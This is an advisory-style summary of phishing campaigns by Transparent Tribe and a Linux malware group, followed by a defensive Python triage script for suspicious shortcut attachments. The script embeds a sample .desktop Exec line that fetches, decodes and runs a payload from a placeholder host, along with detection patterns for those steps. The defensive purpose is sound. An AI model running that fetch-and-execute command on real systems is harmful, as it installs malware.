Phishing Convergence

Recent investigations revealed two phishing-driven campaigns exploiting malicious email attachments:

  • Transparent Tribe (APT36): targets Indian government entities with weaponized .LNK files to deploy RATs for espionage and credential theft.
  • Linux malware campaign: uses malicious RAR archives with deceptive filenames to evade antivirus and install persistent backdoors.

Both cases highlight phishing's adaptability: payloads and file types are tailored to expand attacker reach.

Technical Details

Attack 1: Transparent Tribe with Weaponized LNK Files

  • Initial Access: Phishing emails carrying malicious shortcut files (.LNK for Windows, .desktop for Linux BOSS), disguised as PDFs.
  • Payload Delivery: Opening the file launches a hidden script that fetches a hex-encoded payload from attacker servers (securestore[.]cv). A decoy PDF is opened to avoid suspicion.
  • Execution: On Linux, a shell script drops an ELF binary; on Windows, PowerShell/VB scripts fetch additional malware. Persistence is ensured through cron jobs.
  • Payload: Deployment of Poseidon backdoor, enabling data exfiltration…..
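A defender-side triage check for the Linux shortcut variant described in the bullets above, added here as an example (it is not code from the advisory or from any vendor tooling). It parses a constructed .desktop file, flags the document-style name and double extension, and flags Exec-line constructs matching the described chain (remote fetch, hex decoding, making the drop executable, cron persistence); the hostname in the sample is a placeholder, not an indicator from the report.

```python
import re
from pathlib import PurePosixPath

# Constructed sample modelled on the technique described above: a .desktop
# shortcut named like a PDF whose Exec line fetches a hex-encoded payload,
# decodes it, runs it, then opens a decoy. The URL is a placeholder, not an IoC.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Exec=bash -c "curl -s http://payload.example/p.hex | xxd -r -p > /tmp/.x; chmod +x /tmp/.x; /tmp/.x; xdg-open /tmp/decoy.pdf"
"""

DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx"}
SHORTCUT_EXTS = {".lnk", ".desktop"}
# Shell constructs that have no business in a document shortcut's Exec line.
EXEC_RED_FLAGS = [
    r"\b(curl|wget)\b",        # remote fetch of a second-stage payload
    r"\b(xxd|base64)\b",       # decoding an encoded payload
    r"\bchmod\s+\+x\b",        # making the dropped file executable
    r"\bcrontab\b|/etc/cron",  # cron-based persistence
]

def parse_desktop_entry(text: str) -> dict:
    """Minimal key=value parser for the [Desktop Entry] group."""
    entry = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        entry[key.strip()] = value.strip()
    return entry

def triage_attachment(filename: str, content: str = "") -> list:
    """Return findings for one attachment; an empty list means nothing flagged."""
    findings = []
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    if suffixes and suffixes[-1] in SHORTCUT_EXTS:
        findings.append("shortcut file delivered as an email attachment")
        if len(suffixes) > 1 and suffixes[-2] in DOCUMENT_EXTS:
            findings.append("double extension masquerading as a document")
        if suffixes[-1] == ".desktop" and content:
            entry = parse_desktop_entry(content)
            if PurePosixPath(entry.get("Name", "")).suffix.lower() in DOCUMENT_EXTS:
                findings.append("Name field mimics a document: " + entry["Name"])
            for pattern in EXEC_RED_FLAGS:
                if re.search(pattern, entry.get("Exec", "")):
                    findings.append("suspicious Exec construct: " + pattern)
    return findings
```

Running `triage_attachment("Meeting_Agenda.pdf.desktop", SAMPLE_DESKTOP)` on the constructed sample yields six findings; a plain `report.pdf` yields none.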
